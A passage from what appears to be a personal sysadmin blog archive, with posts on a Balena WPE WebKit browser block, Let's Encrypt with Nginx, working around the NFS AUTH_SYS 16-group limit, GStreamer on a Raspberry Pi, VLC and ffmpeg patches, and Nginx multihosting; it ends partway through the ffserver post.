A new Balena Browser Block based on WPE WebKit is here

TL;DR: The balena-browser-wpe block has been released. This is the result of using the WPE WebKit browser as the chosen web engine for the Balena Browser block. It opens a lot of doors for all kinds of things, really lowering the bar for checking out and exploring an official WPE build with Balena’s very convenient system (more below).


It is my pleasure to announce the public release of the new Balena Browser Block based on WPE WebKit (balena-browser-wpe). This is the result of a close collaboration between Igalia and Balena developers, and was several months in the making. It was made possible in large part by the decision to use the WPE WebKit browser as the web engine for the Balena Browser block. Thanks to everyone involved for making it happen!

As a quick introduction for those who don’t know what Balena is or what they do: Balena.io is a well-known company, mostly for being the authors of balenaEtcher, the open-source utility widely used for flashing disk images onto storage media to create live SD cards and USB flash drives. But for some time now, they have been working on what they call the Balena Cloud, a complete open-source stack of tools, images and services for deploying IoT services.


Why might you be interested in reading this post?

You might find this news especially interesting if:

  • You are interested in building a Balena project using the new Linux graphical stack based on Wayland.
  • You are looking for a browser solution with a very low memory footprint. This block is intended to be usable as an easy and fast evaluation channel for the WPE WebKit web rendering engine for embedded platforms.
  • You are looking for a fully open ecosystem with standardized specifications for your project.
  • You are optimizing your project for the Raspberry Pi 3 or Raspberry Pi 4.

… and, specifically about WebKit, if:

  • You are interested in a platform that uses the latest stable versions of WPE WebKit available.
  • You are interested in playing with the experimental features for WPE WebKit.
  • You are looking for a WPE WebKit solution using the WPE Freedesktop (FDO) backend (wpebackend-fdo).
  • You are looking for a WPE WebKit solution using the Yocto meta-webkit recipes to build the binary images.

The Balena Cloud, as I introduced before, is a complete set of tools for building, deploying, and managing IoT services on connected Linux devices. Balena currently provides service for around half a million connected devices via the Balena Cloud. What I find especially interesting is that every Fleet (Balena’s term for a collection of devices) hosted on the Balena Cloud runs on a fully open-source stack, from the OS flashed onto the devices to the applications running on top of it.

Another service they provide in this ecosystem is the Balena Hub, a catalog of IoT and edge projects created by the community. In this catalog you can find reusable blocks and projects that you can adapt to build your own Balena project. The idea is that you can connect blocks like Lego bricks: choose an X server, then connect a dashboard, later a browser, and so on. In summary, in the Balena ecosystem you can find:

  • Blocks:
    • A drop-in chunk of functionality built to handle the basics.
    • Defined as a Docker image (Dockerfile, docker-compose.yml).
  • Projects:
    • Allow you to design your services in a plug-and-play way by using blocks.
    • The source code of a Fleet (forkable).
  • Fleets (== Applications):
    • Groups of devices running the same code for a specific task.
    • Can be private or public.
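
To make this more concrete, here is a minimal sketch of how two blocks could be wired together in a docker-compose.yml, written from a shell heredoc. The service and image names here are illustrative assumptions, not the actual Balena Hub definitions:

cat > docker-compose.yml << 'EOF'
# Hypothetical sketch: a compositor block plus a browser block
version: '2'
services:
  weston:                        # compositor block (assumed name)
    image: example/balena-weston
    privileged: true
  browser:                       # browser block (assumed name)
    image: example/balena-browser-wpe
    depends_on:
      - weston
EOF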

Coming back to the initial point, what we are announcing here are two new Balena blocks that will be part of the Balena Hub: 1) the balena-browser-wpe block and 2) the balena-weston block.

The design of the balena-browser-wpe block comes with significant innovations with respect to the Balena Browser (balena-browser), which make it significantly different from the former block. For example, unlike balena-browser, which uses a Chromium browser on top of the classic X11 Linux graphical system, the new balena-browser-wpe block provides a hardware-accelerated web browser display based on WPE WebKit on top of the new Linux graphical stack, Wayland, using the Weston compositor.

WPE WebKit allows embedders to create simple and performant systems based on Web Platform technologies. It is a WebKit port designed with flexibility and hardware acceleration in mind, leveraging common 3D graphics APIs for best performance.

Block diagram of the Balena Browser WPE project

Another important difference is that this project is intended to run entirely on a fully open graphical stack for the Raspberry Pi. That means using the Mesa VC4 graphics driver instead of the proprietary Broadcom driver for the Raspberry Pi.

The Raspberry Pi’s Broadcom VideoCore 4 GPU (Graphics Processing Unit) is an OpenGL ES 2.0-compatible 3D engine. The closed-source graphics stack runs on the VC4 GPU and talks to the V3D and display components using proprietary protocols. The Mesa VC4 driver instead provides an open-source implementation of open standards: OpenGL (Open Graphics Library), Vulkan and other graphics API specifications (e.g. GLES2).

Finally, with the Mesa VC4 driver enabled, the API for interacting with the GPU provides, through Mesa, access to the DRM (Direct Rendering Manager) subsystem of the Linux kernel, responsible for interfacing with the GPU, and to the DMA Buffer Sharing Framework needed for the efficient buffer export mechanism required by the Wayland compositor 🚀.

How can I start to play with the Balena Browser WPE?

This is the enjoyable part of the article. Balena provides many of the pieces that you will need, at least from the software point of view (the hardware still has to be supplied by you 🙃). From Balena you will get:

  • The Balena OS, a downloadable OS image; the blocks are executed on top of this base system as isolated containers.
  • The Balena Hub, a source repository for the projects that run on top of the Balena Cloud.
  • and the Balena Cloud, a container-based platform for deploying IoT applications to all the connected devices.

In addition, you will need the sources for the blocks, which we provide:

  • The Balena WPE project, the reference project for building all of the required Balena blocks for running the WPE WebKit browser.
  • The Balena Browser WPE block source code.
  • The Balena Weston block source code.

To get the Balena Browser WPE project working on your Raspberry Pi 3 or 4, begin by following the Getting started guide. Once you reach the Running your first Container section, use the balena-wpe GitHub repository URL instead of the one provided, i.e. instead of git clone https://github.com/balenalabs/multicontainer-getting-started.git, run git clone https://github.com/Igalia/balena-wpe.git
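
As a sketch of the rest of the deploy flow, assuming you have already created a fleet in the Balena Cloud and installed the balena CLI (the fleet name below is a placeholder):

git clone https://github.com/Igalia/balena-wpe.git
cd balena-wpe
balena login          # authenticate the balena CLI against the Balena Cloud
balena push MyFleet   # build and deploy the project to your fleet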

Last but not least …

… now that the sources of the project are public, I intend to keep publishing short posts explaining in detail what I consider the relevant features of this project. We also intend to create a public Balena Fleet based on this project. Personally, I think it could be a nice and easy way for those just getting started to familiarize themselves with the Balena Browser WPE project.

That’s all for now! I hope you will enjoy this contribution. More things are coming soon.

Let’s encrypt!

“The Let’s Encrypt project aims to make encrypted connections to World Wide Web servers ubiquitous. By getting rid of payment, web server configuration, validation emails, and dealing with expired certificates it is meant to significantly lower the complexity of setting up and maintaining TLS encryption.” (Wikipedia)

Let’s Encrypt is a service provided by the Internet Security Research Group (ISRG), a public benefit organization. Major sponsors are the Electronic Frontier Foundation (EFF), the Mozilla Foundation, Akamai, and Cisco Systems. Other partners include the certificate authority IdenTrust, the University of Michigan (U-M), the Stanford Law School, the Linux Foundation as well as Stephen Kent from Raytheon/BBN Technologies and Alex Polvi from CoreOS.

So, in summary, with Let’s Encrypt you will be able to request a valid SSL certificate, free of charge, issued by a recognized CA, avoiding the mess of emails, requests and forms typical of the websites of the classic CA issuers.

The rest of the article shows the steps required for a complete setup of an Nginx server using Let’s Encrypt-issued certificates:

Install the letsencrypt setup script:

cd /usr/local/sbin
sudo wget https://dl.eff.org/certbot-auto
sudo chmod a+x /usr/local/sbin/certbot-auto

Prepare the system for it:

sudo mkdir /var/www/letsencrypt
sudo chgrp www-data /var/www/letsencrypt

A special directory must be accessible to the certificate issuer; add this to your Nginx configuration:

root /var/www/letsencrypt/;
location ~ /.well-known {
    allow all;
}

Restart the service. Let’s Encrypt will then be able to access this domain and verify the authenticity of the request:

sudo service nginx restart

Note: at this point you need a valid DNS A record pointing to the Nginx server host. In this post, I will use mydomain.com as the example domain.
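
For example, you can quickly check the A record with dig before requesting the certificate (mydomain.com is the placeholder domain):

dig +short mydomain.com A   # should print the public IP of the Nginx host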

Request a valid certificate for your domain:

sudo certbot-auto certonly -a webroot --webroot-path=/var/www/letsencrypt -d mydomain.com

If everything is OK, you will get a valid certificate issued for your domain:

/etc/letsencrypt/live/mydomain.com/fullchain.pem

You will need a Diffie-Hellman PEM file for the cryptographic key exchange:

sudo openssl dhparam -out /etc/ssl/certs/dhparam.pem 2048

Set up the Nginx virtual host with SSL as usual, but using the Let’s Encrypt-issued certificate:

...
ssl on;
ssl_certificate /etc/letsencrypt/live/mydomain.com/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/mydomain.com/privkey.pem;

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';
ssl_prefer_server_ciphers on;
ssl_dhparam /etc/ssl/certs/dhparam.pem;
ssl_session_cache shared:SSL:10m;
ssl_session_timeout 5m;

add_header Strict-Transport-Security "max-age=31536000; includeSubDomains";
...

Check the new configuration and restart Nginx:

nginx -t
sudo service nginx restart

Renew the issued certificate periodically via a cron job:

cat << EOF > /etc/cron.d/letsencrypt
30 2 * * 1 root /usr/local/sbin/certbot-auto renew >> /var/log/le-renew.log
35 2 * * 1 root /etc/init.d/nginx reload
EOF
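
Before trusting the cron job, you can verify that the renewal works; certbot supports a --dry-run mode which tests the renewal against the staging servers without saving any certificate:

sudo certbot-auto renew --dry-run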

The NFS 16 groups limit issue

Last Friday I was involved in a curious situation while trying to set up an NFS server. The NFS share was mounted on a UNIX server whose user accounts were assigned to many groups. These users were using files and directories stored on the NFS server.

As a brief description of the situation which incited this post: the problem occurs when you are using UNIX users assigned to more than 16 UNIX groups. In this scenario, if you are using NFS (whatever the version) with UNIX system authentication (AUTH_SYS), quite common nowadays in spite of the security recommendations, you will get a permission denied error while accessing certain arbitrary files and directories. The reason is that the list of secondary groups assigned to the user is truncated by the AUTH_SYS implementation. That is simply amazing!

Well, to be honest, this is not an unknown NFS problem. This limitation has been around since the early stages of modern computing technology. After a quick search on the Internet, I found the reason why this happens: it is not an NFS limitation but a limit specified in AUTH_SYS:

   The client may wish to identify itself, for example, as it is
   identified on a UNIX(tm) system.  The flavor of the client credential
   is "AUTH_SYS".  The opaque data constituting the credential encodes
   the following structure:

         struct authsys_parms {
            unsigned int stamp;
            string machinename<255>;
            unsigned int uid;
            unsigned int gid;
            unsigned int gids<16>;
         };

The root cause

AUTH_SYS is the historical method used by client programs contacting an RPC server. It allows the server to get information about who the client is, how the client should be able to access, and which functions should be allowed. Without authentication, any client on the network that can send packets to the RPC server could access any function.

AUTH_SYS has been in use for years in many systems just because it was the first authentication method available, but it is not a secure authentication method nowadays. With AUTH_SYS, the RPC client sends the UNIX UID and GIDs of the user, and the server implicitly trusts that the user is who the user claims to be. All this information is sent over the network without any kind of encryption or authentication, so it is highly vulnerable.

In consequence, AUTH_SYS is an insecure security mode; it can be used as the proverbial open lock on a door. Overall, the technical articles on these matters strongly suggest the usage of alternatives like NFSv4 (or even NFSv3) with Kerberos, but AUTH_SYS is still commonly used within companies, so we must still deal with it.

Note: This article doesn’t focus on security issues. Its main purpose is to describe a specific situation and show the possible alternatives identified during the troubleshooting of the issue.

Taking up the thread …

I was profiling a situation where the main issue was caused by the truncation of the UNIX secondary groups list. Before continuing, a summary of the context: a UNIX user has a primary group, defined in the passwd database, but can also be a member of many other groups, defined in the group database. UNIX systems historically hardcoded a limit of 16 groups that a user can be a member of (source). This means that clients will only be able to present 16 groups, which is quite poor when you deal with dozens and dozens of groups.

As we already know, the problem lies in NFS’s compliance with the AUTH_SYS specification, which has an in-kernel data structure where the groups a user has access to are hardcoded as an array of 16 identifiers (gids). Even though Linux now supports 65536 groups, it is still not possible to operate on more than 16 of them through AUTH_SYS.
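
A quick way to spot the users affected by this limit is simply to count their groups from a shell (someuser is a placeholder):

# Count the groups a user belongs to; anything above 16 will be
# truncated on the wire by AUTH_SYS
id -G someuser | wc -w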

My scenario …

at this moment, I had identified this same situation in my case: I had users assigned to more than 16 secondary groups and a service using NFS for its data storage but, in addition, I had some more extra furniture in the room:

  • Users of the service are actual UNIX accounts. The authorization for file access is delegated to the UNIX system itself
  • I didn’t have a common LDAP server sharing the uids and gids
  • The NFS service wasn’t under my control

This last point made my case a little bit more miserable, as we will see later.

Getting information from the Internet …

first of all, a brief analysis of the situation is always welcome:

– What is the actual problem? This problem occurs when a user who is a member of more than 16 groups tries to access a file or directory on an NFS mount that depends on their group rights in order to be authorized to see it. Isn’t it?
– Yes!
– So, whatever you do should start by asking Google. If the issue has been present all those years, the solution should be out there too.
– Good idea! – I said, concluding the dialogue with myself.

After a couple of minutes I had a complete list of articles, mail archives, forums and blog posts with all kinds of information about the problem. All of them covered most of the points introduced so far in this article. Each one more or less interesting, one of them stuck out from the others: the solving-the-nfs-16-group-limit-problem article posted on the xkyle.com blog.

The solving-the-nfs-16-group-limit-problem article describes a similar situation and offers its own conclusions. I must admit that I am pretty aligned with them and I would recommend this post for a deep reading.

The silver bullet

This solution is the best case: it applies if you have control of the NFS server and you are running at least Linux kernel 2.6.21. This kernel and newer ones support an NFS feature which allows ignoring the gids sent in the RPC operations and instead uses the local gids assigned to the uid on the server:

-g or --manage-gids
Accept requests from the kernel to map user id numbers into lists of group id numbers for use in access control. An NFS request will normally (except when using Kerberos or other cryptographic authentication) contains a user-id and a list of group-ids. Due to a limitation in the NFS protocol, at most 16 groups ids can be listed. If you use the -g flag, then the list of group ids received from the client will be replaced by a list of group ids determined by an appropriate lookup on the server. Note that the 'primary' group id is not affected so a newgroup command on the client will still be effective. This function requires a Linux Kernel with version at least 2.6.21.

The key to this solution is keeping the ids synchronized between the client and the server. A common way to meet this requirement is a shared Name Service Switch (NSS) service. The --manage-gids option then allows the NFS server to ignore the information sent by the client and to check the groups directly against the information stored in LDAP or whatever backend NSS is using. For this to work, the NFS server and the NFS client must share the UIDs and GIDs.
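
For example, on a Debian-based NFS server this option is typically enabled through the rpc.mountd options; a sketch (check your distribution’s packaging):

# /etc/default/nfs-kernel-server
RPCMOUNTDOPTS="--manage-gids"

# then restart the NFS services
sudo service nfs-kernel-server restart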

That is the approach suggested in solving-the-nfs-16-group-limit-problem. Unfortunately, it did not apply to my case :-(.

But not in my case

In my case, I had no way to synchronize the ids of the client with the ids of the NFS server. The ids on the client server were obtained from a Postgres database plugged into the NSS as one of its backends, and there was no chance to use this backend for the NFS server.

The solution

But this was not the end. Fortunately, the nfs-ngroups patches developed by frankvm@frankvm.com remove the 16-entry limit on the list of supplemental group identifiers sent by the Linux NFS client. As the author says in the README file:

This patch is useful when users are member of more than 16 groups on a Linux NFS client. The patch bypasses this protocol imposed limit in a compatible manner (i.e. no server patching).

That was perfect! It was exactly what I was looking for. So I had to build a custom kernel with the right patch applied on the server under my control and voilà!:

wget https://cdn.kernel.org/pub/linux/kernel/v3.x/linux-3.10.101.tar.xz
wget http://www.frankvm.com/nfs-ngroups/3.10-nfs-ngroups-4.60.patch
tar -xf linux-3.10.101.tar.xz
cd linux-3.10.101/
patch < ../3.10-nfs-ngroups-4.60.patch
make oldconfig
make menuconfig
make rpm
rpm -i /root/rpmbuild/RPMS/x86_64/kernel-3.10.101-4.x86_64.rpm
dracut "initramfs-3.10.101.img" 3.10.101
grub2-mkconfig > /boot/grub2/grub.cfg

Steps for CentOS, based on these three documents: [1] [2] [3]

Conclusions

As I said, this post doesn’t focus on the security stuff. AUTH_SYS is a solution designed for the times before the Internet. Nowadays, the total interconnection of computer networks discourages the usage of methods like AUTH_SYS; it is too naive an authentication method for the present.

Anyway, NFS services are still quite common and many of them are still deployed with AUTH_SYS rather than Kerberos or other intermediate solutions. This post is about a specific situation in one of these deployments. Even if these services should progressively be replaced by more secure solutions, a sysadmin still demands practical feedback about the particularities of these legacy systems.

Knowledge about the NFS 16 secondary groups limit and the different recognized workarounds is still interesting from the know-how point of view. This post shows two solutions, or even three if you count the Kerberos option, to fix this issue … just one of them fulfilled the requirements of my particular case.

New revision of redmine-cmd released

Yesterday, I decided to spend some of my time on a tiny tool I created a year and a half ago. This tool is named redmine-cmd and, obviously, its purpose is to use the Redmine ticketing system directly from the console, but also to submit the time spent on each task automatically.

The tool was functional with Redmine <= 1.2 until now, but it didn’t implement the full API definition covered by the latest versions of Redmine. The reason is that the places where I was using this tool had not been upgraded to the latest version of Redmine for years. One of the consequences was that many API/REST endpoints were not available to my tool in those early Redmine environments, so relevant values related to a Redmine issue, such as the tracker id, the activity id or the issue status code, couldn’t be obtained from the server. These restrictions caused weird things like having to define enumerators in the redmine-cmd configuration file with the same values as on the server.

 

redmine-cmd console example

But it’s a new time today: the last Redmine with a version < 2.2 is no longer around me so, yesterday, I finally decided to finish the integration with the Redmine API, using the endpoints required by my tool to dynamically get all the required data from the server:

The final implementation is already available in the public PIP repositories, under the MIT license, to be used by everybody. The usage is quite trivial and the installation and setup steps are documented in the README file. Please download and use it; any feedback will be welcome.
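
A minimal installation sketch, assuming the PyPI package name matches the project name:

pip install redmine-cmd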

External link: https://github.com/psaavedra/redmine-cmd

Using GStreamer with OpenMAX on a Raspberry Pi

This minipost shows a subset of commands tested on a Raspberry Pi to evaluate the possibility of using this hardware as a domestic TV headend.

  • From a UDP/TS source with MPEG2 video to another UDP multicast group, transcoding the video stream to H264:
    gst-launch-1.0 -v udpsrc uri=udp://239.123.123.3:1234 ! tsdemux ! queue ! mpegvideoparse ! omxmpeg2videodec ! videoconvert ! omxh264enc ! video/x-h264,stream-format=byte-stream,profile=high ! h264parse ! mpegtsmux ! udpsink host=239.123.124.3 port=1234 auto-multicast=true

    The GStreamer pipeline doesn’t break/end, but there is a bug in h264parse: it doesn’t send the needed SPS/PPS information regularly (http://www.raspberrypi.org/forums/viewtopic.php?f=70&t=59412). The resulting stream is therefore only playable if you get it from the beginning (see the possible workaround after this list).

  • From a UDP/TS source with MPEG2 video and MP2 audio to another UDP multicast group, transcoding the video stream to H264 and the audio to AAC:
    gst-launch-1.0 -v udpsrc uri=udp://239.123.123.1:1234 ! queue ! tsdemux name=dem \
    dem. ! queue ! mpegvideoparse ! mpeg2dec ! videoconvert ! omxh264enc control-rate=1 target-bitrate=1000000 ! video/x-h264,stream-format=byte-stream,profile=high ! h264parse config-interval=2 ! queue ! muxer. \
    dem. ! queue ! mpegaudioparse ! mpg123audiodec ! audioconvert ! faac ! queue ! muxer. \
    flvmux name=muxer ! queue ! rtmpsink location="rtmp://rtmp.server:1935/rtmp/test2 live=test2"

    The GStreamer pipeline breaks for some unknown reason.

  • From a UDP/TS source with MPEG2 video to a RTMP server, transcoding to H264:
    gst-launch-1.0 -v udpsrc uri=udp://239.123.123.1:1234 ! queue ! tsdemux name=dem \
    dem. ! queue ! mpegvideoparse ! mpeg2dec ! videoconvert ! omxh264enc control-rate=1 target-bitrate=1000000 ! video/x-h264,stream-format=byte-stream,profile=high ! h264parse config-interval=2 ! queue ! muxer. \
    flvmux name=muxer ! queue ! rtmpsink location="rtmp://rtmp.server:1935/rtmp/test2 live=test2"

    Works fine and smoothly. The source is an MPEG/TS SD channel.

  • From a UDP/TS source with MP2 audio to a RTMP server, transcoding the audio channel to AAC:
    gst-launch-1.0 -v udpsrc uri=udp://239.123.123.1:1234 ! queue ! tsdemux name=dem \
    dem. ! queue ! mpegaudioparse ! mpg123audiodec ! audioconvert ! faac ! queue ! muxer. \
    flvmux name=muxer ! queue ! rtmpsink location="rtmp://rtmp.server:1935/rtmp/test2 live=test2"

    Works fine and smoothly.
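
As a possible workaround for the SPS/PPS issue observed in the first pipeline, h264parse exposes a config-interval property (already used in the pipelines above) which re-inserts the SPS/PPS every N seconds. An untested variant of the first pipeline:

gst-launch-1.0 -v udpsrc uri=udp://239.123.123.3:1234 ! tsdemux ! queue ! mpegvideoparse ! omxmpeg2videodec ! videoconvert ! omxh264enc ! video/x-h264,stream-format=byte-stream,profile=high ! h264parse config-interval=2 ! mpegtsmux ! udpsink host=239.123.124.3 port=1234 auto-multicast=true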

Hide the VLC cone icon in the browser-plugin-vlc for Linux (Mozilla or Webkit) (Debian way)

vlc
VideoLAN’s fu***ng cone

The following instructions describe how to hide the VLC cone icon in the VLC plugin for web browsers. I think this tip can be useful for other ninjas, insofar as there is not a lot of information on the Internet describing this. The instructions follow the Debian way and use the Debian/DPKG tools, but I guess the example is explicit enough to be extrapolated to other environments.

Requirements:

  • You need to install all the build dependencies for browser-plugin-vlc before executing dpkg-buildpackage -rfakeroot (see the command below)
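
On Debian, apt-get can pull all of the build dependencies for you (assuming you have deb-src entries in your sources.list):

sudo apt-get build-dep browser-plugin-vlc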

Steps:

  • apt-get source browser-plugin-vlc
  • cd npapi-vlc-2.0.0/
  • edit npapi/vlcplugin_gtk.cpp and replace the code as follows:
    --- npapi-vlc-2.0.0.orig/npapi/vlcplugin_gtk.cpp
    +++ npapi-vlc-2.0.0/npapi/vlcplugin_gtk.cpp
    @@ -46,12 +46,13 @@ VlcPluginGtk::VlcPluginGtk(NPP instance,
         vol_slider_timeout_id(0)
     {
         memset(&video_xwindow, 0, sizeof(Window));
    -    GtkIconTheme *icon_theme = gtk_icon_theme_get_default();
    -    cone_icon = gdk_pixbuf_copy(gtk_icon_theme_load_icon(
    -                    icon_theme, "vlc", 128, GTK_ICON_LOOKUP_FORCE_SIZE, NULL));
    -    if (!cone_icon) {
    -        fprintf(stderr, "WARNING: could not load VLC icon\n");
    -    }
    +    cone_icon = NULL;
     }
     
     VlcPluginGtk::~VlcPluginGtk()
    
  • dpkg-source --commit
  • dpkg-buildpackage -rfakeroot
  • cd ../
  • ls browser-plugin-vlc_2.0.0-2_amd64.deb

Installation:

  • dpkg -i browser-plugin-vlc_2.0.0-2_amd64.deb

Disabling a site-wide action on Django

If you need to disable a site-wide action you can call AdminSite.disable_action():
admin.site.disable_action('delete_selected') (see: the Django reference guide)

… or

from django.contrib import admin

class ApplicationAdmin(admin.ModelAdmin):
  def get_actions(self, request):
    actions = super(ApplicationAdmin, self).get_actions(request)
    if 'delete_selected' in actions:
      del actions['delete_selected']
    return actions

… for a specific ModelAdmin.

Automated multihosting with Nginx for PHP with FastCGI

Nginx configuration for this:

  • if the client request does not have X-Forwarded-For, deny the request with a 404
  • allow access to whitelisted hosts and URIs even without X-Forwarded-For
  • if the “Host” header is an IP, use /var/www/vhosts/ip as the root dir
  • if the “Host” header is a domain, use /var/www/vhosts/$domain as the root dir
  • if “Host” is sub0.sub1.oranything.domain, it still goes to /var/www/vhosts/$domain
  • a backend for PHP FastCGI
  • if the requested file doesn’t exist, throw a 404 error
  • setting the default index page

Strongly based on http://kbeezie.com/view/nginx/

server {

server_name www.example.com default_server;
listen 0.0.0.0:80;

# Keep a root path in the server level, this will help automatically fill
# Information for stuff like FastCGI Parameters
root /var/www/vhosts/;

# You can set access and error logs at http, server and location level
access_log /var/log/nginx/server.access.log;
error_log /var/log/nginx/server.error.log debug;

# if client request does not have x_forwarded_for, deny the request,
if ($http_x_forwarded_for = "" ) { set $x 1; }
# .. except if host is www.public1.com|www.public2.com
if ($host ~* "(www\.public1\.com|www\.public2\.com)" ) { set $x 0; }
# .. or if uri is publicdir
if ($uri ~* "(publicdir)" ) { set $x 0; }
# .. evaluating $x
if ($x = 1) { return 404; }

# if Host is a IP vhost is "ip"
if ($host ~* "(\d+)\.(\d+)\.(\d+)\.(\d+)" ) { set $vhost "ip"; }

# if Host is a DN vhost is the vhost
if ($host ~* "(\w+\.)*(\w+)\.([a-z]+)" ) { set $vhost "$2.$3"; }

# If the file doesn't exist: Error 404
if (!-e $document_root/$vhost/$uri) { return 404; }

# Setting the index page
set $i "/index.html";
if (-e $document_root/$vhost/index.php) { set $i "/index.php"; }
if (-e $document_root/$vhost/index.htm) { set $i "/index.htm"; }
if ($uri ~* "(.*)/") {
rewrite ^(.*)(/)$ $1$i redirect;
}
if (-d $document_root/$vhost/$uri) {
rewrite ^(.*)$ $1$i redirect;
}

# It will try for static file, folder, then falls back to index.php
# Assuming index.php is capable of parsing the URI automatically
location / {
try_files /$vhost$uri /$vhost/index.php ;
}

# Prevent ".." navigations: Error 403
location ~ \..*/.*\.php$ {
return 403;
}

# This block will catch static file requests, such as images, css, js
# The ?: prefix is a 'non-capturing' mark, meaning we do not require
# the pattern to be captured into $1 which should help improve performance
location ~* \.(?:ico|css|js|gif|jpe?g|png)$ {
# Some basic cache-control for static files to be sent to the browser
expires max;
add_header Pragma public;
add_header Cache-Control "public, must-revalidate, proxy-revalidate";
}

# PHP location block and parameters
location ~ \.php {
if (!-e $document_root/$vhost/$uri) { return 404; }
fastcgi_param QUERY_STRING $query_string;
fastcgi_param REQUEST_METHOD $request_method;
fastcgi_param CONTENT_TYPE $content_type;
fastcgi_param CONTENT_LENGTH $content_length;

fastcgi_param SCRIPT_NAME $fastcgi_script_name;
fastcgi_param SCRIPT_FILENAME $document_root/$vhost/$fastcgi_script_name;
fastcgi_param REQUEST_URI $request_uri;
fastcgi_param DOCUMENT_URI $document_uri;
fastcgi_param DOCUMENT_ROOT $document_root;
fastcgi_param SERVER_PROTOCOL $server_protocol;

fastcgi_param GATEWAY_INTERFACE CGI/1.1;
fastcgi_param SERVER_SOFTWARE nginx;

fastcgi_param REMOTE_ADDR $remote_addr;
fastcgi_param REMOTE_PORT $remote_port;
#fastcgi_param SERVER_ADDR $server_addr;
fastcgi_param SERVER_ADDR $remote_addr;
fastcgi_param SERVER_PORT $server_port;
fastcgi_param SERVER_NAME $server_name;
fastcgi_param HTTP_HOST $host;

fastcgi_connect_timeout 60;
fastcgi_send_timeout 180;
fastcgi_read_timeout 180;
fastcgi_buffer_size 128k;
fastcgi_buffers 8 256k;
fastcgi_busy_buffers_size 256k;
fastcgi_temp_file_write_size 256k;
fastcgi_intercept_errors on;

# I use a socket for php, tends to be faster
# for TCP just use 127.0.0.1:port#
# fastcgi_pass unix:/opt/php-fpm.sock;
fastcgi_pass 127.0.0.1:9000;

# Not normally needed for wordpress since you are
# sending everything to index.php in try_files
# this tells it to use index.php when the url
# ends in a trailing slash such as domain.com/
fastcgi_index index.php;
}

# Most sites won't have configured favicon or robots.txt
# and since they're always grabbed, turn them off in the access log
# and turn off their not-found errors in the error log
location = /favicon.ico { access_log off; log_not_found off; }
location = /robots.txt { access_log off; log_not_found off; }

# Rather than just denying .ht* in the config, why not deny
# access to all .invisible files
location ~ /\. { deny all; access_log off; log_not_found off; }
}
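
A quick way to test the vhost routing is to fake the Host and X-Forwarded-For headers with curl (the hostnames and the server IP below are placeholders):

# Served from /var/www/vhosts/example.com/ (X-Forwarded-For is
# required, otherwise this configuration answers 404)
curl -H "X-Forwarded-For: 198.51.100.1" -H "Host: www.example.com" http://203.0.113.10/

# Host is an IP, so this one is served from /var/www/vhosts/ip/
curl -H "X-Forwarded-For: 198.51.100.1" -H "Host: 203.0.113.10" http://203.0.113.10/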

Tips about FFserver & FFmpeg

FFmpeg

Today, I want to share a few tips about the ffmpeg and ffserver multimedia tools. FFmpeg is an open-source project that produces libraries and programs for handling multimedia data. FFserver is an HTTP and RTSP multimedia streaming server for live broadcasts. It can also time-shift live broadcasts.

All the settings used in this article have been tested on an AMD64 Debian Squeeze OS using the FFmpeg Debian packages from the Debian Multimedia repositories:

ffmpeg 5:0.6.1+svn20101128-0.2

You can get the Debian Multimedia repositories by adding these lines to your APT sources.list file:

deb http://www.debian-multimedia.org squeeze main
deb-src http://www.debian-multimedia.org squeeze main

Note that, with this same version, I’ve observed a problem when trying to run ffserver:

Mon Apr 25 13:29:09 2011 Aspect ratio mismatch between encoder and muxer layer

To make ffserver work in this version of ffmpeg it is necessary to hack the source code:

    1. Install DPKG development tools:  apt-get install dpkg-dev
    2. Get sources: apt-get source ffmpeg
    3. Go to sources directory: cd ffmpeg-dmo-0.6.1+svn20101128/
    4. Apply the patch:
      Index: libavutil/rational.h
      ===================================================================
      --- libavutil/rational.h    (revision 25549)
      +++ libavutil/rational.h    (working copy)
      @@ -29,7 +29,6 @@
      #define AVUTIL_RATIONAL_H
      
      #include <stdint.h>
      -#include <limits.h>
      #include "attributes.h"
      
      /**
      @@ -44,16 +43,13 @@
      * Compare two rationals.
      * @param a first rational
      * @param b second rational
      - * @return 0 if a==b, 1 if a>b, -1 if a<b, and INT_MIN if one of the
      - * values is of the form 0/0
      + * @return 0 if a==b, 1 if a>b and -1 if a<b
      */
      static inline int av_cmp_q(AVRational a, AVRational b){
      const int64_t tmp= a.num * (int64_t)b.den - b.num * (int64_t)a.den;
      
      if(tmp) return ((tmp ^ a.den ^ b.den)>>63)|1;
      -    else if(b.den && a.den) return 0;
      -    else if(a.num && b.num) return (a.num>>31) - (b.num>>31);
      -    else                    return INT_MIN;
      +    else    return 0;
      }
      
      /**
  • Install all the dependencies necessary to build the package:
    apt-get install  debhelper libmp3lame-dev zlib1g-dev libvorbis-dev libsdl-dev libfaac-dev quilt texi2html libxvidcore4-dev liblzo2-dev libx264-dev  libtheora-dev libgsm1-dev ccache libbz2-dev libxvmc-dev libdc1394-22-dev libdirac-dev   libschroedinger-dev libspeex-dev yasm libopenjpeg-dev libopencore-amrwb-dev libvdpau-dev libopencore-amrnb-dev libxfixes-dev libasound-dev libva-dev libjack-dev libvpx-dev  librtmp-dev doxygen
  • Build the packages: dpkg-buildpackage -rfakeroot
  • Finally you’ll have the new *.deb packages:
    # ls ../*.deb
    ffmpeg_0.6.1+svn20101128-0.2_amd64.deb         libavfilter-dev_0.6.1+svn20101128-0.2_amd64.deb
    ffmpeg-dbg_0.6.1+svn20101128-0.2_amd64.deb     libavformat52_0.6.1+svn20101128-0.2_amd64.deb
    ffmpeg-doc_0.6.1+svn20101128-0.2_all.deb     libavformat-dev_0.6.1+svn20101128-0.2_amd64.deb
    libavcodec52_0.6.1+svn20101128-0.2_amd64.deb     libavutil50_0.6.1+svn20101128-0.2_amd64.deb
    libavcodec-dev_0.6.1+svn20101128-0.2_amd64.deb     libavutil-dev_0.6.1+svn20101128-0.2_amd64.deb
    libavcore0_0.6.1+svn20101128-0.2_amd64.deb     libpostproc51_0.6.1+svn20101128-0.2_amd64.deb
    libavcore-dev_0.6.1+svn20101128-0.2_amd64.deb     libpostproc-dev_0.6.1+svn20101128-0.2_amd64.deb
    libavdevice52_0.6.1+svn20101128-0.2_amd64.deb     libswscale0_0.6.1+svn20101128-0.2_amd64.deb
    libavdevice-dev_0.6.1+svn20101128-0.2_amd64.deb  libswscale-dev_0.6.1+svn20101128-0.2_amd64.deb
    libavfilter1_0.6.1+svn20101128-0.2_amd64.deb

After installing the ffmpeg packages, you’ll be able to run ffserver tuned as you like. For this aim, you can run it as follows: ffserver -f your_ffserver_settings.conf. The ffserver configuration file should have the following structure:

  • Main settings:
